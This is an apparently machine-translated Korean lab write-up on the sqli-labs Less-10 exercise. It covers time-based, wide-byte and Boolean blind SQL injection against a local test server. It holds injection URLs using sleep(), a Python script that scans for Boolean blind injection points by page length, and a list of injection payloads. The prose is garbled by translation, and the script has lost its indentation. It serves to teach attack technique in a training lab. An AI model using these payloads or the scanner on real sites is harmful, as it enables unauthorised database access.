[sqli-labs]적 게-10(시간 블라인드,넓 은 바이트 주입,Bool 블라인드)
http://127.0.0.1/Less-10/?id=1
http://127.0.0.1/Less-10/?id=1%22
http://127.0.0.1/Less-10/?id=1%22%20and%20sleep(1)--+
http://127.0.0.1/Less-10/?id=1%22%20and%20(%271%27=%27%27%20or%20sleep(3))--+
http://127.0.0.1/Less-10/?id=1%22%20and%20(()%20or%20sleep(3))--+
후기:그 후에 Bool 블라인드 를 대량으로 검사 하 는 스 크 립 트 를 썼 습 니 다.도망 간 후에 Bool 블라인드 의 주입 점 이 있 는 것 을 발 견 했 습 니 다.
0"|()--+
0%df"|()--+
이 두 가지 상황 은 모두 맹목적 으로 주석 을 달 수 있 습 니 다.이전의 스 크 립 트 를 이용 하여 달 릴 수 있 습 니 다.라 이브 러 리 에서 벗 어 날 수 있 습 니 다.다음은 Bool 블라인드 인지 아 닌 지 를 대량으로 검사 하 는 스 크 립 트 입 니 다.바 쁘 고 누추 하 게 썼 습 니 다.주로 페이지 의 길 이 를 판단 하여 Bool 블라인드 인지 아 닌 지 를 판단 하 는 것 입 니 다.
#!/usr/bin/env python
# encoding:utf8
import requests
rules = open('rules', 'r')
baseUrl = "http://127.0.0.1/Less-10/?id="
url = baseUrl + "1"
contentLength = len(requests.get(url).text)
print " : ",contentLength
for line in rules:
if line.startswith("#"):
continue
if line == "\r
":
continue
line = line[0:-1]
startTemp = line.split("()")[0]
endTemp = line.split("()")[1]
testUrl1 = baseUrl + startTemp + "0" + endTemp
testUrl2 = baseUrl + startTemp + "1" + endTemp
# print "Checking : " + testUrl1 + "\t",
len1 = len(requests.get(testUrl1).text)
# print len1
len2 = len(requests.get(testUrl2).text)
# print testUrl2,"\t",len2
if (len1 != contentLength) and (len2 == contentLength):
print baseUrl + line
# : ,
0|()--+
0'|()--+
0"|()--+
0)|()--+
0')|()--+
0")|()--+
0))|()--+
0'))|()--+
0"))|()--+
0)))|()--+
#####################################
# ( )
0%df'|()--+
0%df')|()--+
0%df'))|()--+
#####################################
#
0%df"|()--+
0%df")|()--+
0%df"))|()--+
이 내용에 흥미가 있습니까?
현재 기사가 여러분의 문제를 해결하지 못하는 경우 AI 엔진은 머신러닝 분석(스마트 모델이 방금 만들어져 부정확한 경우가 있을 수 있음)을 통해 가장 유사한 기사를 추천합니다:
다양한 언어의 JSONJSON은 Javascript 표기법을 사용하여 데이터 구조를 레이아웃하는 데이터 형식입니다. 그러나 Javascript가 코드에서 이러한 구조를 나타낼 수 있는 유일한 언어는 아닙니다. 저는 일반적으로 '객체'{}...
텍스트를 자유롭게 공유하거나 복사할 수 있습니다.하지만 이 문서의 URL은 참조 URL로 남겨 두십시오.
CC BY-SA 2.5, CC BY-SA 3.0 및 CC BY-SA 4.0에 따라 라이센스가 부여됩니다.
좋은 웹페이지 즐겨찾기
